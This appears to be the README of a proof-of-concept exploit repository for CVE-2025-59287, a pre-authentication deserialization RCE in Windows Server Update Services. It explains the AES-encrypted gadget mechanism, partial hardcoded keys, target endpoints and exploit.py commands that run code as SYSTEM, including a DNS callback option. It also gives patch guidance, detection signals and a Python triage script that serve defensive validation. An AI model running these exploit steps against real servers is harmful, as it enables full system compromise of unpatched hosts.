Windows Server Update Services (WSUS) remote code execution via insecure .NET deserialization of an attacker-controlled
AuthorizationCookie. Pre-auth, network-reachable, code runs as SYSTEM.
⚠️ AUTHORIZED TEST-ENVIRONMENT USE ONLY. For detection engineering and defensive validation against a WSUS lab server you own/control — isolated, snapshotted, and never internet-exposed. This was mass-exploited in the wild (CISA KEV); do not point it at anything you are not explicitly authorized to test.
| Field | Value |
|---|---|
| CVE | CVE-2025-59287 |
| Product | Windows Server Update Services (WSUS Server Role) |
| Class | Deserialization of Untrusted Data (CWE-502) → unauth RCE |
| CVSS 3.1 | 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Auth | None (pre-authentication, over the network) |
| Execution context | SYSTEM — inside `w3wp.exe` (WsusPool) or `wsusservice.exe` |
| Affected | Windows Server 2012, 2012 R2, 2016, 2019, 2022, 2022 23H2, 2025 — only when the WSUS Server Role is enabled |
| Default ports | 8530 (HTTP), 8531 (HTTPS) |
| Disclosed | 2025-10-18 · initial fix 2025-10-14 (incomplete) |
| Patched | out-of-band 2025-10-23 — KB5070881 (2025), KB5070879 (23H2), KB5070884 (2022), KB5070883 (2019), KB5070882 (2016), KB5070886 (2012 R2), KB5070887 (2012) |
| In the wild | CISA KEV 2025-10-24; ~8,000 exposed servers; active mass exploitation within hours of the patch |
| ATT&CK | T1190 (Exploit Public-Facing App), T1059.001/003 (PowerShell/cmd) |
A WSUS web service decrypts an attacker-supplied AuthorizationCookie /
EncryptedData field using AES-128-CBC with a hardcoded key (zero IV), then
passes the plaintext straight to a .NET formatter without validating the
resulting object type. A crafted, AES-encrypted deserialization gadget chain
therefore executes arbitrary code as SYSTEM.
Public analyses describe two vectors. This PoC implements the first as default and templates the second:

| | client (default) | reporting |
|---|---|---|
| Endpoint | `/ClientWebService/Client.asmx` | `/ReportingWebService/ReportingWebService.asmx` |
| SOAP method | `GetCookie` | `ReportEventBatch` |
| Formatter | BinaryFormatter | SoapFormatter (custom binder) |
| Field | `AuthorizationCookie.CookieData` | `ReportingEvent.MiscData` |
| Notes | Used by most public PoCs and in-the-wild AuthorizationCookie reports | Code White argues this SoapFormatter path (introduced by the Oct 14 update) is the precise CVE-2025-59287 fix target |
Other reachable web services that share the cookie-decryption code:
`/SimpleAuthWebService/SimpleAuth.asmx`, `/ApiRemoting30/WebService.asmx`.
This is a deserialization exploit, so two values must exactly match the target — and public sources genuinely disagree on them:

- The hardcoded AES key. Public PoCs circulate two different 16-byte keys (`--key hawktrace=877C14E4…`, `--key garvitv14=5B5A583A…`). If neither works against your build, extract the real key from the target's WSUS assemblies (`Microsoft.UpdateServices.Internal.BaseApi.dll` / `…Internal.Authorization`) and pass it via `--key <hex>`. The `--salt` flag toggles the 16-byte plaintext salt some builds expect.
- The gadget/formatter must match the deserializer. Use `-f BinaryFormatter` gadgets for the `client` endpoint and `-f SoapFormatter` for `reporting`.
A successful hit often returns HTTP 500 with a deserialization/cast exception — the SOAP method errors after your gadget already executed. That error is the signal, not a failure. Confirm execution on the target, not from the HTTP response.
```text
CVE-2025-59287-PoC/
├─ README.md
├─ exploit.py                    # gadget (ysoserial) -> AES-CBC -> base64 -> SOAP -> POST
├─ requirements.txt              # requests, pycryptodome
├─ lab/
│  └─ install_wsus.ps1           # install the WSUS role to build a vulnerable target
└─ detection/
   ├─ cve-2025-59287.sigma.yml   # Sigma: WSUS proc -> shell; + suspicious POSTs
   └─ hunting.kql                # Defender XDR / Sentinel hunting queries
```
The PoC does not bundle a payload generator: you supply `ysoserial.net`. The default command is benign (writes a proof file); change it with `--cmd`.
You need a real WSUS server as the target:

- A disposable, network-isolated Windows Server VM — snapshot it.
- Install the WSUS role and confirm it's UNPATCHED vs. the 2025-10-23 update:

  ```powershell
  powershell -ExecutionPolicy Bypass -File .\lab\install_wsus.ps1
  Get-HotFix | Where-Object HotFixID -match '5070'   # should be EMPTY to be vulnerable
  ```

- On your attacker box: Python 3, `pip install -r requirements.txt`, and a copy of `ysoserial.exe`.
Never bind WSUS 8530/8531 to an untrusted network. The whole point of this CVE is that exposed WSUS = instant SYSTEM.
```sh
# benign proof-of-execution against the lab WSUS server
python exploit.py --target 10.0.0.50 --ysoserial C:\tools\ysoserial.exe

# try the other key candidate if the first build doesn't bite
python exploit.py -t 10.0.0.50 --ysoserial C:\tools\ysoserial.exe --key garvitv14

# HTTPS, custom (benign) command
python exploit.py -t wsus.lab --ssl --port 8531 --ysoserial C:\tools\ysoserial.exe \
    --cmd "cmd /c whoami > C:\poc-cve-2025-59287\proof.txt 2>&1"

# secondary SoapFormatter path (template — tune to your target)
python exploit.py -t 10.0.0.50 --endpoint reporting --gadget TypeConfuseDelegate \
    --ysoserial C:\tools\ysoserial.exe
```

Confirm success on the WSUS server (not from the HTTP response):

```powershell
type C:\poc-cve-2025-59287\proof.txt   # default benign payload -> shows 'nt authority\system'
```

…and you should see the detections in §6 fire (`w3wp.exe`/`wsusservice.exe` → `cmd.exe`).
For an out-of-band confirmation without touching disk, set --cmd to a benign
callback you control, e.g. cmd /c nslookup poc.<your-collab-domain>.
Remediate: install the 2025-10-23 out-of-band update (or later) for your
Server version. If you can't patch immediately, Microsoft's interim guidance was
to disable the WSUS Server Role or block inbound 8530/8531 at the host
firewall. Verify: `Get-HotFix | ? HotFixID -match '5070'`.
Detect (see `detection/`):

- Process chain (best signal): `w3wp.exe` (WsusPool) or `wsusservice.exe` spawning `cmd.exe` / `powershell.exe` / LOLBins — Sysmon EID 1 / Event ID 4688. A healthy WSUS host essentially never does this. → `cve-2025-59287.sigma.yml`, `hunting.kql` query #1.
- Server logs (IR): cast/deserialization exceptions in `…\Update Services\LogFiles\SoftwareDistribution.log` (`ObjectManager.DoFixups`, `DeserializeDataSetSchema`, "Exception has been thrown by the target of an invocation"); BinaryFormatter magic prefix `AAEAAAD/////`; large `POST` to the `.asmx` endpoints in IIS `u_ex*.log`.
- Egress: connections from the WSUS process to `webhook.site` / `*.workers.dev` / DNS beacons → `hunting.kql` query #3.
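The process-chain and server-log signals above, turned into runnable triage logic as an added example (not part of this repo's `detection/` files): it checks Sysmon EID 1-style records for a WSUS worker spawning a shell, parses IIS W3C lines by their `#Fields` header for large POSTs to `.asmx` endpoints, and greps `SoftwareDistribution.log` lines for the deserialization markers. The record field names, the 4096-byte threshold and the sample data are constructed assumptions; adapt them to your own telemetry.

```python
WSUS_PARENTS = {"w3wp.exe", "wsusservice.exe"}
# cmd/powershell come from the README; the extra LOLBin names are my assumption
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe", "mshta.exe"}
BINFMT_MAGIC = "AAEAAAD/////"  # base64 of the BinaryFormatter header, as noted above
LOG_MARKERS = ("ObjectManager.DoFixups", "DeserializeDataSetSchema",
               "Exception has been thrown by the target of an invocation", BINFMT_MAGIC)

def _basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_wsus_shell_spawn(event):
    """Sysmon EID 1 / 4688-style dict: WSUS worker process spawning a shell."""
    return (_basename(event["ParentImage"]) in WSUS_PARENTS
            and _basename(event["Image"]) in SHELLS)

def large_asmx_posts(iis_lines, min_bytes=4096):
    """Parse IIS W3C lines via the #Fields header; return (uri, cs-bytes, sc-status)
    for POSTs to .asmx endpoints with a body of at least min_bytes (threshold assumed)."""
    fields, hits = [], []
    for line in iis_lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rec = dict(zip(fields, line.split()))
            size = int(rec.get("cs-bytes", 0))
            if (rec.get("cs-method") == "POST"
                    and rec.get("cs-uri-stem", "").lower().endswith(".asmx")
                    and size >= min_bytes):
                hits.append((rec["cs-uri-stem"], size, rec.get("sc-status")))
    return hits

def deserialization_errors(log_lines):
    """SoftwareDistribution.log lines carrying any of the cast/deserialization markers."""
    return [l for l in log_lines if any(m in l for m in LOG_MARKERS)]

# Constructed sample telemetry (not captured from a real host)
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "Image": r"C:\Windows\System32\cmd.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe"},
]
SAMPLE_IIS = [
    "#Fields: date time cs-method cs-uri-stem sc-status cs-bytes",
    "2025-10-24 03:12:09 POST /ClientWebService/Client.asmx 500 18744",
    "2025-10-24 03:12:10 POST /ClientWebService/Client.asmx 200 912",
    "2025-10-24 03:12:11 GET /Content/AB/example.cab 200 0",
]
SAMPLE_SDLOG = [
    "2025-10-24 03:12:09.301 UTC Error w3wp.12 System.Runtime.Serialization.ObjectManager.DoFixups()",
    "2025-10-24 03:12:09.302 UTC Info w3wp.12 ClientImplementation.GetCookie",
]

if __name__ == "__main__":
    print([is_wsus_shell_spawn(e) for e in SAMPLE_EVENTS])  # [True, False]
    print(large_asmx_posts(SAMPLE_IIS))  # [('/ClientWebService/Client.asmx', 18744, '500')]
    print(deserialization_errors(SAMPLE_SDLOG))  # the DoFixups line only
```

Note the first IIS sample line pairs a large POST with HTTP 500, the "error after execution" pattern described earlier; on a real host, correlate it with a shell spawn from the same minute before calling it a hit.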
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-59287
- Microsoft MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287
- HawkTrace technical analysis: https://hawktrace.com/blog/cve-2025-59287/
- Code White (SoapFormatter / ReportEventBatch path): https://code-white.com/blog/
- Huntress (in-the-wild exploitation + IOCs): https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability
- Palo Alto Unit 42: https://unit42.paloaltonetworks.com/microsoft-cve-2025-59287/
- ysoserial.net (gadget generation): https://github.com/pwntester/ysoserial.net